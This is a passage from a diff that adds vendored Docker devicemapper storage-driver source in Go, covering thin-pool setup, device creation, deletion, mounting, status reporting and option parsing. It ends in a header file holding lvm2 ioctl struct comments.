+	// In the future we might use "dev-" for "device file", etc.
+	// docker-maj,min[-inode] stands for:
+	//	- Managed by docker
+	//	- The target of this device is at major <maj> and minor <min>
+	//	- If <inode> is defined, use that file inside the device as a loopback image. Otherwise use the device itself.
+	devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(sysSt.Dev), minor(sysSt.Dev), sysSt.Ino)
+	logrus.Debugf("devmapper: Generated prefix: %s", devices.devicePrefix)
+
+	// Check for the existence of the thin-pool device
+	poolExists, err := devices.thinPoolExists(devices.getPoolName())
+	if err != nil {
+		return err
+	}
+
+	// It seems libdevmapper opens this without O_CLOEXEC, and go exec will not close files
+	// that are not Close-on-exec,
+	// so we add this badhack to make sure it closes itself
+	setCloseOnExec("/dev/mapper/control")
+
+	// Make sure the sparse images exist in <root>/devicemapper/data and
+	// <root>/devicemapper/metadata
+
+	createdLoopback := false
+
+	// If the pool doesn't exist, create it
+	if !poolExists && devices.thinPoolDevice == "" {
+		logrus.Debug("devmapper: Pool doesn't exist. Creating it.")
+
+		var (
+			dataFile     *os.File
+			metadataFile *os.File
+		)
+
+		if devices.dataDevice == "" {
+			// Make sure the sparse images exist in <root>/devicemapper/data
+
+			hasData := devices.hasImage("data")
+
+			if !doInit && !hasData {
+				return errors.New("loopback data file not found")
+			}
+
+			if !hasData {
+				createdLoopback = true
+			}
+
+			data, err := devices.ensureImage("data", devices.dataLoopbackSize)
+			if err != nil {
+				logrus.Debugf("devmapper: Error device ensureImage (data): %s", err)
+				return err
+			}
+
+			dataFile, err = loopback.AttachLoopDevice(data)
+			if err != nil {
+				return err
+			}
+			devices.dataLoopFile = data
+			devices.dataDevice = dataFile.Name()
+		} else {
+			dataFile, err = os.OpenFile(devices.dataDevice, os.O_RDWR, 0600)
+			if err != nil {
+				return err
+			}
+		}
+		defer dataFile.Close()
+
+		if devices.metadataDevice == "" {
+			// Make sure the sparse images exist in <root>/devicemapper/metadata
+
+			hasMetadata := devices.hasImage("metadata")
+
+			if !doInit && !hasMetadata {
+				return errors.New("loopback metadata file not found")
+			}
+
+			if !hasMetadata {
+				createdLoopback = true
+			}
+
+			metadata, err := devices.ensureImage("metadata", devices.metaDataLoopbackSize)
+			if err != nil {
+				logrus.Debugf("devmapper: Error device ensureImage (metadata): %s", err)
+				return err
+			}
+
+			metadataFile, err = loopback.AttachLoopDevice(metadata)
+			if err != nil {
+				return err
+			}
+			devices.metadataLoopFile = metadata
+			devices.metadataDevice = metadataFile.Name()
+		} else {
+			metadataFile, err = os.OpenFile(devices.metadataDevice, os.O_RDWR, 0600)
+			if err != nil {
+				return err
+			}
+		}
+		defer metadataFile.Close()
+
+		if err := devicemapper.CreatePool(devices.getPoolName(), dataFile, metadataFile, devices.thinpBlockSize); err != nil {
+			return err
+		}
+	}
+
+	// Pool already exists and caller did not pass us a pool. That means
+	// we probably created pool earlier and could not remove it as some
+	// containers were still using it. Detect some of the properties of
+	// pool, like is it using loop devices.
+	if poolExists && devices.thinPoolDevice == "" {
+		if err := devices.loadThinPoolLoopBackInfo(); err != nil {
+			logrus.Debugf("devmapper: Failed to load thin pool loopback device information:%v", err)
+			return err
+		}
+	}
+
+	// If we didn't just create the data or metadata image, we need to
+	// load the transaction id and migrate old metadata
+	if !createdLoopback {
+		if err := devices.initMetaData(); err != nil {
+			return err
+		}
+	}
+
+	if devices.thinPoolDevice == "" {
+		if devices.metadataLoopFile != "" || devices.dataLoopFile != "" {
+			logrus.Warn("devmapper: Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man docker` to refer to dm.thinpooldev section.")
+		}
+	}
+
+	// Right now this loads only NextDeviceID. If there is more metadata
+	// down the line, we might have to move it earlier.
+	if err := devices.loadDeviceSetMetaData(); err != nil {
+		return err
+	}
+
+	// Setup the base image
+	if doInit {
+		if err := devices.setupBaseImage(); err != nil {
+			logrus.Debugf("devmapper: Error device setupBaseImage: %s", err)
+			return err
+		}
+	}
+
+	return nil
+}
+
+// AddDevice adds a device and registers in the hash.
+func (devices *DeviceSet) AddDevice(hash, baseHash string, storageOpt map[string]string) error {
+	logrus.Debugf("devmapper: AddDevice START(hash=%s basehash=%s)", hash, baseHash)
+	defer logrus.Debugf("devmapper: AddDevice END(hash=%s basehash=%s)", hash, baseHash)
+
+	// If a deleted device exists, return error.
+	baseInfo, err := devices.lookupDeviceWithLock(baseHash)
+	if err != nil {
+		return err
+	}
+
+	if baseInfo.Deleted {
+		return fmt.Errorf("devmapper: Base device %v has been marked for deferred deletion", baseInfo.Hash)
+	}
+
+	baseInfo.lock.Lock()
+	defer baseInfo.lock.Unlock()
+
+	devices.Lock()
+	defer devices.Unlock()
+
+	// Also include deleted devices in case hash of new device is
+	// same as one of the deleted devices.
+	if info, _ := devices.lookupDevice(hash); info != nil {
+		return fmt.Errorf("devmapper: device %s already exists. Deleted=%v", hash, info.Deleted)
+	}
+
+	size, err := devices.parseStorageOpt(storageOpt)
+	if err != nil {
+		return err
+	}
+
+	if size == 0 {
+		size = baseInfo.Size
+	}
+
+	if size < baseInfo.Size {
+		return fmt.Errorf("devmapper: Container size cannot be smaller than %s", units.HumanSize(float64(baseInfo.Size)))
+	}
+
+	if err := devices.takeSnapshot(hash, baseInfo, size); err != nil {
+		return err
+	}
+
+	// Grow the container rootfs.
+	if size > baseInfo.Size {
+		info, err := devices.lookupDevice(hash)
+		if err != nil {
+			return err
+		}
+
+		if err := devices.growFS(info); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) parseStorageOpt(storageOpt map[string]string) (uint64, error) {
+
+	// Read size to change the block device size per container.
+	for key, val := range storageOpt {
+		key := strings.ToLower(key)
+		switch key {
+		case "size":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return 0, err
+			}
+			return uint64(size), nil
+		default:
+			return 0, fmt.Errorf("Unknown option %s", key)
+		}
+	}
+
+	return 0, nil
+}
+
+func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error {
+	// If device is already in deleted state, there is nothing to be done.
+	if info.Deleted {
+		return nil
+	}
+
+	logrus.Debugf("devmapper: Marking device %s for deferred deletion.", info.Hash)
+
+	info.Deleted = true
+
+	// save device metadata to reflect deleted state.
+	if err := devices.saveMetadata(info); err != nil {
+		info.Deleted = false
+		return err
+	}
+
+	devices.nrDeletedDevices++
+	return nil
+}
+
+// Should be called with devices.Lock() held.
+func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) error {
+	if err := devices.openTransaction(info.Hash, info.DeviceID); err != nil {
+		logrus.Debugf("devmapper: Error opening transaction hash = %s deviceId = %d", "", info.DeviceID)
+		return err
+	}
+
+	defer devices.closeTransaction()
+
+	err := devicemapper.DeleteDevice(devices.getPoolDevName(), info.DeviceID)
+	if err != nil {
+		// If syncDelete is true, we want to return error. If deferred
+		// deletion is not enabled, we return an error. If error is
+		// something other then EBUSY, return an error.
+		if syncDelete || !devices.deferredDelete || err != devicemapper.ErrBusy {
+			logrus.Debugf("devmapper: Error deleting device: %s", err)
+			return err
+		}
+	}
+
+	if err == nil {
+		if err := devices.unregisterDevice(info.DeviceID, info.Hash); err != nil {
+			return err
+		}
+		// If device was already in deferred delete state that means
+		// deletion was being tried again later. Reduce the deleted
+		// device count.
+		if info.Deleted {
+			devices.nrDeletedDevices--
+		}
+		devices.markDeviceIDFree(info.DeviceID)
+	} else {
+		if err := devices.markForDeferredDeletion(info); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+// Issue discard only if device open count is zero.
+func (devices *DeviceSet) issueDiscard(info *devInfo) error {
+	logrus.Debugf("devmapper: issueDiscard START(device: %s).", info.Hash)
+	defer logrus.Debugf("devmapper: issueDiscard END(device: %s).", info.Hash)
+	// This is a workaround for the kernel not discarding block so
+	// on the thin pool when we remove a thinp device, so we do it
+	// manually.
+	// Even if device is deferred deleted, activate it and issue
+	// discards.
+	if err := devices.activateDeviceIfNeeded(info, true); err != nil {
+		return err
+	}
+
+	devinfo, err := devicemapper.GetInfo(info.Name())
+	if err != nil {
+		return err
+	}
+
+	if devinfo.OpenCount != 0 {
+		logrus.Debugf("devmapper: Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount)
+		return nil
+	}
+
+	if err := devicemapper.BlockDeviceDiscard(info.DevName()); err != nil {
+		logrus.Debugf("devmapper: Error discarding block on device: %s (ignoring)", err)
+	}
+	return nil
+}
+
+// Should be called with devices.Lock() held.
+func (devices *DeviceSet) deleteDevice(info *devInfo, syncDelete bool) error {
+	if devices.doBlkDiscard {
+		devices.issueDiscard(info)
+	}
+
+	// Try to deactivate device in case it is active.
+	if err := devices.deactivateDevice(info); err != nil {
+		logrus.Debugf("devmapper: Error deactivating device: %s", err)
+		return err
+	}
+
+	if err := devices.deleteTransaction(info, syncDelete); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// DeleteDevice will return success if device has been marked for deferred
+// removal. If one wants to override that and want DeleteDevice() to fail if
+// device was busy and could not be deleted, set syncDelete=true.
+func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error {
+	logrus.Debugf("devmapper: DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete)
+	defer logrus.Debugf("devmapper: DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete)
+	info, err := devices.lookupDeviceWithLock(hash)
+	if err != nil {
+		return err
+	}
+
+	info.lock.Lock()
+	defer info.lock.Unlock()
+
+	devices.Lock()
+	defer devices.Unlock()
+
+	return devices.deleteDevice(info, syncDelete)
+}
+
+func (devices *DeviceSet) deactivatePool() error {
+	logrus.Debug("devmapper: deactivatePool() START")
+	defer logrus.Debug("devmapper: deactivatePool() END")
+	devname := devices.getPoolDevName()
+
+	devinfo, err := devicemapper.GetInfo(devname)
+	if err != nil {
+		return err
+	}
+
+	if devinfo.Exists == 0 {
+		return nil
+	}
+	if err := devicemapper.RemoveDevice(devname); err != nil {
+		return err
+	}
+
+	if d, err := devicemapper.GetDeps(devname); err == nil {
+		logrus.Warnf("devmapper: device %s still has %d active dependents", devname, d.Count)
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) deactivateDevice(info *devInfo) error {
+	logrus.Debugf("devmapper: deactivateDevice START(%s)", info.Hash)
+	defer logrus.Debugf("devmapper: deactivateDevice END(%s)", info.Hash)
+
+	devinfo, err := devicemapper.GetInfo(info.Name())
+	if err != nil {
+		return err
+	}
+
+	if devinfo.Exists == 0 {
+		return nil
+	}
+
+	if devices.deferredRemove {
+		if err := devicemapper.RemoveDeviceDeferred(info.Name()); err != nil {
+			return err
+		}
+	} else {
+		if err := devices.removeDevice(info.Name()); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// Issues the underlying dm remove operation.
+func (devices *DeviceSet) removeDevice(devname string) error {
+	var err error
+
+	logrus.Debugf("devmapper: removeDevice START(%s)", devname)
+	defer logrus.Debugf("devmapper: removeDevice END(%s)", devname)
+
+	for i := 0; i < 200; i++ {
+		err = devicemapper.RemoveDevice(devname)
+		if err == nil {
+			break
+		}
+		if err != devicemapper.ErrBusy {
+			return err
+		}
+
+		// If we see EBUSY it may be a transient error,
+		// sleep a bit a retry a few times.
+		devices.Unlock()
+		time.Sleep(100 * time.Millisecond)
+		devices.Lock()
+	}
+
+	return err
+}
+
+func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error {
+	if !devices.deferredRemove {
+		return nil
+	}
+
+	logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded START(%s)", info.Name())
+	defer logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded END(%s)", info.Name())
+
+	devinfo, err := devicemapper.GetInfoWithDeferred(info.Name())
+	if err != nil {
+		return err
+	}
+
+	if devinfo != nil && devinfo.DeferredRemove == 0 {
+		return nil
+	}
+
+	// Cancel deferred remove
+	if err := devices.cancelDeferredRemoval(info); err != nil {
+		// If Error is ErrEnxio. Device is probably already gone. Continue.
+		if err != devicemapper.ErrEnxio {
+			return err
+		}
+	}
+	return nil
+}
+
+func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error {
+	logrus.Debugf("devmapper: cancelDeferredRemoval START(%s)", info.Name())
+	defer logrus.Debugf("devmapper: cancelDeferredRemoval END(%s)", info.Name())
+
+	var err error
+
+	// Cancel deferred remove
+	for i := 0; i < 100; i++ {
+		err = devicemapper.CancelDeferredRemove(info.Name())
+		if err != nil {
+			if err == devicemapper.ErrBusy {
+				// If we see EBUSY it may be a transient error,
+				// sleep a bit a retry a few times.
+				devices.Unlock()
+				time.Sleep(100 * time.Millisecond)
+				devices.Lock()
+				continue
+			}
+		}
+		break
+	}
+	return err
+}
+
+// Shutdown shuts down the device by unmounting the root.
+func (devices *DeviceSet) Shutdown(home string) error {
+	logrus.Debugf("devmapper: [deviceset %s] Shutdown()", devices.devicePrefix)
+	logrus.Debugf("devmapper: Shutting down DeviceSet: %s", devices.root)
+	defer logrus.Debugf("devmapper: [deviceset %s] Shutdown() END", devices.devicePrefix)
+
+	// Stop deletion worker. This should start delivering new events to
+	// ticker channel. That means no new instance of cleanupDeletedDevice()
+	// will run after this call. If one instance is already running at
+	// the time of the call, it must be holding devices.Lock() and
+	// we will block on this lock till cleanup function exits.
+	devices.deletionWorkerTicker.Stop()
+
+	devices.Lock()
+	// Save DeviceSet Metadata first. Docker kills all threads if they
+	// don't finish in certain time. It is possible that Shutdown()
+	// routine does not finish in time as we loop trying to deactivate
+	// some devices while these are busy. In that case shutdown() routine
+	// will be killed and we will not get a chance to save deviceset
+	// metadata. Hence save this early before trying to deactivate devices.
+	devices.saveDeviceSetMetaData()
+
+	// ignore the error since it's just a best effort to not try to unmount something that's mounted
+	mounts, _ := mount.GetMounts()
+	mounted := make(map[string]bool, len(mounts))
+	for _, mnt := range mounts {
+		mounted[mnt.Mountpoint] = true
+	}
+
+	if err := filepath.Walk(path.Join(home, "mnt"), func(p string, info os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+		if !info.IsDir() {
+			return nil
+		}
+
+		if mounted[p] {
+			// We use MNT_DETACH here in case it is still busy in some running
+			// container. This means it'll go away from the global scope directly,
+			// and the device will be released when that container dies.
+			if err := syscall.Unmount(p, syscall.MNT_DETACH); err != nil {
+				logrus.Debugf("devmapper: Shutdown unmounting %s, error: %s", p, err)
+			}
+		}
+
+		if devInfo, err := devices.lookupDevice(path.Base(p)); err != nil {
+			logrus.Debugf("devmapper: Shutdown lookup device %s, error: %s", path.Base(p), err)
+		} else {
+			if err := devices.deactivateDevice(devInfo); err != nil {
+				logrus.Debugf("devmapper: Shutdown deactivate %s , error: %s", devInfo.Hash, err)
+			}
+		}
+
+		return nil
+	}); err != nil && !os.IsNotExist(err) {
+		devices.Unlock()
+		return err
+	}
+
+	devices.Unlock()
+
+	info, _ := devices.lookupDeviceWithLock("")
+	if info != nil {
+		info.lock.Lock()
+		devices.Lock()
+		if err := devices.deactivateDevice(info); err != nil {
+			logrus.Debugf("devmapper: Shutdown deactivate base , error: %s", err)
+		}
+		devices.Unlock()
+		info.lock.Unlock()
+	}
+
+	devices.Lock()
+	if devices.thinPoolDevice == "" {
+		if err := devices.deactivatePool(); err != nil {
+			logrus.Debugf("devmapper: Shutdown deactivate pool , error: %s", err)
+		}
+	}
+	devices.Unlock()
+
+	return nil
+}
+
+// Recent XFS changes allow changing behavior of filesystem in case of errors.
+// When thin pool gets full and XFS gets ENOSPC error, currently it tries
+// IO infinitely and sometimes it can block the container process
+// and process can't be killWith 0 value, XFS will not retry upon error
+// and instead will shutdown filesystem.
+
+func (devices *DeviceSet) xfsSetNospaceRetries(info *devInfo) error {
+	dmDevicePath, err := os.Readlink(info.DevName())
+	if err != nil {
+		return fmt.Errorf("devmapper: readlink failed for device %v:%v", info.DevName(), err)
+	}
+
+	dmDeviceName := path.Base(dmDevicePath)
+	filePath := "/sys/fs/xfs/" + dmDeviceName + "/error/metadata/ENOSPC/max_retries"
+	maxRetriesFile, err := os.OpenFile(filePath, os.O_WRONLY, 0)
+	if err != nil {
+		return fmt.Errorf("devmapper: user specified daemon option dm.xfs_nospace_max_retries but it does not seem to be supported on this system :%v", err)
+	}
+	defer maxRetriesFile.Close()
+
+	// Set max retries to 0
+	_, err = maxRetriesFile.WriteString(devices.xfsNospaceRetries)
+	if err != nil {
+		return fmt.Errorf("devmapper: Failed to write string %v to file %v:%v", devices.xfsNospaceRetries, filePath, err)
+	}
+	return nil
+}
+
+// MountDevice mounts the device if not already mounted.
+func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error {
+	info, err := devices.lookupDeviceWithLock(hash)
+	if err != nil {
+		return err
+	}
+
+	if info.Deleted {
+		return fmt.Errorf("devmapper: Can't mount device %v as it has been marked for deferred deletion", info.Hash)
+	}
+
+	info.lock.Lock()
+	defer info.lock.Unlock()
+
+	devices.Lock()
+	defer devices.Unlock()
+
+	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
+		return fmt.Errorf("devmapper: Error activating devmapper device for '%s': %s", hash, err)
+	}
+
+	fstype, err := ProbeFsType(info.DevName())
+	if err != nil {
+		return err
+	}
+
+	options := ""
+
+	if fstype == "xfs" {
+		// XFS needs nouuid or it can't mount filesystems with the same fs
+		options = joinMountOptions(options, "nouuid")
+	}
+
+	options = joinMountOptions(options, devices.mountOptions)
+	options = joinMountOptions(options, label.FormatMountLabel("", mountLabel))
+
+	if err := mount.Mount(info.DevName(), path, fstype, options); err != nil {
+		return fmt.Errorf("devmapper: Error mounting '%s' on '%s': %s", info.DevName(), path, err)
+	}
+
+	if fstype == "xfs" && devices.xfsNospaceRetries != "" {
+		if err := devices.xfsSetNospaceRetries(info); err != nil {
+			syscall.Unmount(path, syscall.MNT_DETACH)
+			devices.deactivateDevice(info)
+			return err
+		}
+	}
+
+	return nil
+}
+
+// UnmountDevice unmounts the device and removes it from hash.
+func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error {
+	logrus.Debugf("devmapper: UnmountDevice START(hash=%s)", hash)
+	defer logrus.Debugf("devmapper: UnmountDevice END(hash=%s)", hash)
+
+	info, err := devices.lookupDeviceWithLock(hash)
+	if err != nil {
+		return err
+	}
+
+	info.lock.Lock()
+	defer info.lock.Unlock()
+
+	devices.Lock()
+	defer devices.Unlock()
+
+	logrus.Debugf("devmapper: Unmount(%s)", mountPath)
+	if err := syscall.Unmount(mountPath, syscall.MNT_DETACH); err != nil {
+		return err
+	}
+	logrus.Debug("devmapper: Unmount done")
+
+	if err := devices.deactivateDevice(info); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// HasDevice returns true if the device metadata exists.
+func (devices *DeviceSet) HasDevice(hash string) bool {
+	info, _ := devices.lookupDeviceWithLock(hash)
+	return info != nil
+}
+
+// List returns a list of device ids.
+func (devices *DeviceSet) List() []string {
+	devices.Lock()
+	defer devices.Unlock()
+
+	ids := make([]string, len(devices.Devices))
+	i := 0
+	for k := range devices.Devices {
+		ids[i] = k
+		i++
+	}
+	return ids
+}
+
+func (devices *DeviceSet) deviceStatus(devName string) (sizeInSectors, mappedSectors, highestMappedSector uint64, err error) {
+	var params string
+	_, sizeInSectors, _, params, err = devicemapper.GetStatus(devName)
+	if err != nil {
+		return
+	}
+	if _, err = fmt.Sscanf(params, "%d %d", &mappedSectors, &highestMappedSector); err == nil {
+		return
+	}
+	return
+}
+
+// GetDeviceStatus provides size, mapped sectors
+func (devices *DeviceSet) GetDeviceStatus(hash string) (*DevStatus, error) {
+	info, err := devices.lookupDeviceWithLock(hash)
+	if err != nil {
+		return nil, err
+	}
+
+	info.lock.Lock()
+	defer info.lock.Unlock()
+
+	devices.Lock()
+	defer devices.Unlock()
+
+	status := &DevStatus{
+		DeviceID:      info.DeviceID,
+		Size:          info.Size,
+		TransactionID: info.TransactionID,
+	}
+
+	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
+		return nil, fmt.Errorf("devmapper: Error activating devmapper device for '%s': %s", hash, err)
+	}
+
+	sizeInSectors, mappedSectors, highestMappedSector, err := devices.deviceStatus(info.DevName())
+
+	if err != nil {
+		return nil, err
+	}
+
+	status.SizeInSectors = sizeInSectors
+	status.MappedSectors = mappedSectors
+	status.HighestMappedSector = highestMappedSector
+
+	return status, nil
+}
+
+func (devices *DeviceSet) poolStatus() (totalSizeInSectors, transactionID, dataUsed, dataTotal, metadataUsed, metadataTotal uint64, err error) {
+	var params string
+	if _, totalSizeInSectors, _, params, err = devicemapper.GetStatus(devices.getPoolName()); err == nil {
+		_, err = fmt.Sscanf(params, "%d %d/%d %d/%d", &transactionID, &metadataUsed, &metadataTotal, &dataUsed, &dataTotal)
+	}
+	return
+}
+
+// DataDevicePath returns the path to the data storage for this deviceset,
+// regardless of loopback or block device
+func (devices *DeviceSet) DataDevicePath() string {
+	return devices.dataDevice
+}
+
+// MetadataDevicePath returns the path to the metadata storage for this deviceset,
+// regardless of loopback or block device
+func (devices *DeviceSet) MetadataDevicePath() string {
+	return devices.metadataDevice
+}
+
+func (devices *DeviceSet) getUnderlyingAvailableSpace(loopFile string) (uint64, error) {
+	buf := new(syscall.Statfs_t)
+	if err := syscall.Statfs(loopFile, buf); err != nil {
+		logrus.Warnf("devmapper: Couldn't stat loopfile filesystem %v: %v", loopFile, err)
+		return 0, err
+	}
+	return buf.Bfree * uint64(buf.Bsize), nil
+}
+
+func (devices *DeviceSet) isRealFile(loopFile string) (bool, error) {
+	if loopFile != "" {
+		fi, err := os.Stat(loopFile)
+		if err != nil {
+			logrus.Warnf("devmapper: Couldn't stat loopfile %v: %v", loopFile, err)
+			return false, err
+		}
+		return fi.Mode().IsRegular(), nil
+	}
+	return false, nil
+}
+
+// Status returns the current status of this deviceset
+func (devices *DeviceSet) Status() *Status {
+	devices.Lock()
+	defer devices.Unlock()
+
+	status := &Status{}
+
+	status.PoolName = devices.getPoolName()
+	status.DataFile = devices.DataDevicePath()
+	status.DataLoopback = devices.dataLoopFile
+	status.MetadataFile = devices.MetadataDevicePath()
+	status.MetadataLoopback = devices.metadataLoopFile
+	status.UdevSyncSupported = devicemapper.UdevSyncSupported()
+	status.DeferredRemoveEnabled = devices.deferredRemove
+	status.DeferredDeleteEnabled = devices.deferredDelete
+	status.DeferredDeletedDeviceCount = devices.nrDeletedDevices
+	status.BaseDeviceSize = devices.getBaseDeviceSize()
+	status.BaseDeviceFS = devices.getBaseDeviceFS()
+
+	totalSizeInSectors, _, dataUsed, dataTotal, metadataUsed, metadataTotal, err := devices.poolStatus()
+	if err == nil {
+		// Convert from blocks to bytes
+		blockSizeInSectors := totalSizeInSectors / dataTotal
+
+		status.Data.Used = dataUsed * blockSizeInSectors * 512
+		status.Data.Total = dataTotal * blockSizeInSectors * 512
+		status.Data.Available = status.Data.Total - status.Data.Used
+
+		// metadata blocks are always 4k
+		status.Metadata.Used = metadataUsed * 4096
+		status.Metadata.Total = metadataTotal * 4096
+		status.Metadata.Available = status.Metadata.Total - status.Metadata.Used
+
+		status.SectorSize = blockSizeInSectors * 512
+
+		if check, _ := devices.isRealFile(devices.dataLoopFile); check {
+			actualSpace, err := devices.getUnderlyingAvailableSpace(devices.dataLoopFile)
+			if err == nil && actualSpace < status.Data.Available {
+				status.Data.Available = actualSpace
+			}
+		}
+
+		if check, _ := devices.isRealFile(devices.metadataLoopFile); check {
+			actualSpace, err := devices.getUnderlyingAvailableSpace(devices.metadataLoopFile)
+			if err == nil && actualSpace < status.Metadata.Available {
+				status.Metadata.Available = actualSpace
+			}
+		}
+
+		minFreeData := (dataTotal * uint64(devices.minFreeSpacePercent)) / 100
+		status.MinFreeSpace = minFreeData * blockSizeInSectors * 512
+	}
+
+	return status
+}
+
+// Status returns the current status of this deviceset
+func (devices *DeviceSet) exportDeviceMetadata(hash string) (*deviceMetadata, error) {
+	info, err := devices.lookupDeviceWithLock(hash)
+	if err != nil {
+		return nil, err
+	}
+
+	info.lock.Lock()
+	defer info.lock.Unlock()
+
+	metadata := &deviceMetadata{info.DeviceID, info.Size, info.Name()}
+	return metadata, nil
+}
+
+// NewDeviceSet creates the device set based on the options provided.
+func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps []idtools.IDMap) (*DeviceSet, error) {
+	devicemapper.SetDevDir("/dev")
+
+	devices := &DeviceSet{
+		root:                  root,
+		metaData:              metaData{Devices: make(map[string]*devInfo)},
+		dataLoopbackSize:      defaultDataLoopbackSize,
+		metaDataLoopbackSize:  defaultMetaDataLoopbackSize,
+		baseFsSize:            defaultBaseFsSize,
+		overrideUdevSyncCheck: defaultUdevSyncOverride,
+		doBlkDiscard:          true,
+		thinpBlockSize:        defaultThinpBlockSize,
+		deviceIDMap:           make([]byte, deviceIDMapSz),
+		deletionWorkerTicker:  time.NewTicker(time.Second * 30),
+		uidMaps:               uidMaps,
+		gidMaps:               gidMaps,
+		minFreeSpacePercent:   defaultMinFreeSpacePercent,
+	}
+
+	foundBlkDiscard := false
+	for _, option := range options {
+		key, val, err := parsers.ParseKeyValueOpt(option)
+		if err != nil {
+			return nil, err
+		}
+		key = strings.ToLower(key)
+		switch key {
+		case "dm.basesize":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return nil, err
+			}
+			userBaseSize = true
+			devices.baseFsSize = uint64(size)
+		case "dm.loopdatasize":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return nil, err
+			}
+			devices.dataLoopbackSize = size
+		case "dm.loopmetadatasize":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return nil, err
+			}
+			devices.metaDataLoopbackSize = size
+		case "dm.fs":
+			if val != "ext4" && val != "xfs" {
+				return nil, fmt.Errorf("devmapper: Unsupported filesystem %s\n", val)
+			}
+			devices.filesystem = val
+		case "dm.mkfsarg":
+			devices.mkfsArgs = append(devices.mkfsArgs, val)
+		case "dm.mountopt":
+			devices.mountOptions = joinMountOptions(devices.mountOptions, val)
+		case "dm.metadatadev":
+			devices.metadataDevice = val
+		case "dm.datadev":
+			devices.dataDevice = val
+		case "dm.thinpooldev":
+			devices.thinPoolDevice = strings.TrimPrefix(val, "/dev/mapper/")
+		case "dm.blkdiscard":
+			foundBlkDiscard = true
+			devices.doBlkDiscard, err = strconv.ParseBool(val)
+			if err != nil {
+				return nil, err
+			}
+		case "dm.blocksize":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return nil, err
+			}
+			// convert to 512b sectors
+			devices.thinpBlockSize = uint32(size) >> 9
+		case "dm.override_udev_sync_check":
+			devices.overrideUdevSyncCheck, err = strconv.ParseBool(val)
+			if err != nil {
+				return nil, err
+			}
+
+		case "dm.use_deferred_removal":
+			enableDeferredRemoval, err = strconv.ParseBool(val)
+			if err != nil {
+				return nil, err
+			}
+
+		case "dm.use_deferred_deletion":
+			enableDeferredDeletion, err = strconv.ParseBool(val)
+			if err != nil {
+				return nil, err
+			}
+
+		case "dm.min_free_space":
+			if !strings.HasSuffix(val, "%") {
+				return nil, fmt.Errorf("devmapper: Option dm.min_free_space requires %% suffix")
+			}
+
+			valstring := strings.TrimSuffix(val, "%")
+			minFreeSpacePercent, err := strconv.ParseUint(valstring, 10, 32)
+			if err != nil {
+				return nil, err
+			}
+
+			if minFreeSpacePercent >= 100 {
+				return nil, fmt.Errorf("devmapper: Invalid value %v for option dm.min_free_space", val)
+			}
+
+			devices.minFreeSpacePercent = uint32(minFreeSpacePercent)
+		case "dm.xfs_nospace_max_retries":
+			_, err := strconv.ParseUint(val, 10, 64)
+			if err != nil {
+				return nil, err
+			}
+			devices.xfsNospaceRetries = val
+		default:
+			return nil, fmt.Errorf("devmapper: Unknown option %s\n", key)
+		}
+	}
+
+	// By default, don't do blk discard hack on raw devices, its rarely useful and is expensive
+	if !foundBlkDiscard && (devices.dataDevice != "" || devices.thinPoolDevice != "") {
+		devices.doBlkDiscard = false
+	}
+
+	if err := devices.initDevmapper(doInit); err != nil {
+		return nil, err
+	}
+
+	return devices, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go
new file mode 100644
index 0000000000..9ab3e4f864
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go
@@ -0,0 +1,106 @@
+package devmapper
+
+// Definition of struct dm_task and sub structures (from lvm2)
+//
+// struct dm_ioctl {
+// 	/*
+// 	 * The version number is made up of three parts:
+// 	 * major - no backward or forward compatibility,
+// 	 * minor - only backwards compatible,
+// 	 * patch - both backwards and forwards compatible.
+// 	 *
+// 	 * All clients of the ioctl interface should fill in the
+// 	 * version number of the interface that they were
+// 	 * compiled with.
+// 	 *
+// 	 * All recognized ioctl commands (ie. those that don't
+// 	 * return -ENOTTY) fill out this field, even if the
+// 	 * command failed.
+// 	 */
+// 	uint32_t version[3];	/* in/out */
+// 	uint32_t data_size;	/* total size of data passed in
+// 				 * including this struct */
+
+// 	uint32_t data_start;	/* offset to start of data
+// 				 * relative to start of this struct */
+
+// 	uint32_t target_count;	/* in/out */
+// 	int32_t open_count;	/* out */
+// 	uint32_t flags;		/* in/out */
+
+// 	/*
+// 	 * event_nr holds either the event number (input and output) or the
+// 	 * udev cookie value (input only).
+// 	 * The DM_DEV_WAIT ioctl takes an event number as input.
+// 	 * The DM_SUSPEND, DM_DEV_REMOVE and DM_DEV_RENAME ioctls
+// 	 * use the field as a cookie to return in the DM_COOKIE
+// 	 * variable with the uevents they issue.
+// 	 * For output, the ioctls return the event number, not the cookie.
+// 	 */
+// 	uint32_t event_nr;      	/* in/out */
+// 	uint32_t padding;
+
+// 	uint64_t dev;		/* in/out */
+
+// 	char name[DM_NAME_LEN];	/* device name */
+// 	char uuid[DM_UUID_LEN];	/* unique identifier for
